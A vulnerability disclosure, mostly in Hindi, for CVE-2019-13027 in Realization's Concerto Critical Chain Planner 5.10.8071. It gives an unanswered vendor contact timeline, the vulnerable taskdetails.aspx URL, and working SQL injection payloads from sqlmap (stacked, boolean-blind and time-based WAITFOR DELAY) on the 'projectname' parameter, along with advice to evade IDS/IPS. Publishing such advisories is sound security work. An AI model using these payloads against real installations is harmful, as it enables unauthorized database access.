
CVE-2019-13027 का खुलासा करने के लिए विवरण
CVE-2019-13027 का खुलासा करने के लिए विवरण
विक्रेता संपर्क समयरेखा: 1 जुलाई 2019 -> कोई प्रतिक्रिया नहीं, कोई ईमेल वापस नहीं।
4 जुलाई 2019 -> कोई प्रतिक्रिया नहीं, कोई ईमेल वापस नहीं।
8 जुलाई 2019 -> ईमेल भेजा गया, Github बनाया गया।
11 जुलाई 2019 -> कोई विक्रेता प्रतिक्रिया नहीं। कमजोरी का खुलासा किया गया।
[कमजोरी का प्रकार] SQL इंजेक्शन [प्रभावित उत्पाद कोड बेस] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - संस्करण: 5.10.8071 (5.x शाखा पर अन्य संस्करण शायद प्रभावित हैं। अन्य शाखाओं के साथ परीक्षण नहीं कर सकते)
[प्रभावित घटक] Realization Concerto Critical Chain Planner (उर्फ CCPM) 5.10.8071 में कुछ गंभीर सुरक्षा समस्याएं हैं, कम से कम taskupdt/taskdetails.aspx वेबपेज में "projectname" पैरामीटर के माध्यम से SQL इंजेक्शन है।
[हमले का प्रकार] दूरस्थ
[हमले के वेक्टर] एप्लिकेशन में बहुत सारे रिफ्लेक्टेड XSS/CSRF हैं (उदाहरण के लिए, checklist/checklist में), लेकिन मुश्किल हिस्सा SQL इंजेक्शन है। SQL Server संस्करण और/या IDS/IPS के आधार पर कुछ छेड़छाड़ की आवश्यकता है।
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
ProjectName (foo) मौजूद और मान्य होना चाहिए। शेष पैरामीटरों को Fuzz करें (या वास्तविक अनुरोध का उपयोग करें)। foo में भी एक XSS है
पता लगाए गए SQL (SQLMAP से पेलोड) Parameter: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--
[उत्पाद का विक्रेता] REALIZATION - https://www.realization.com/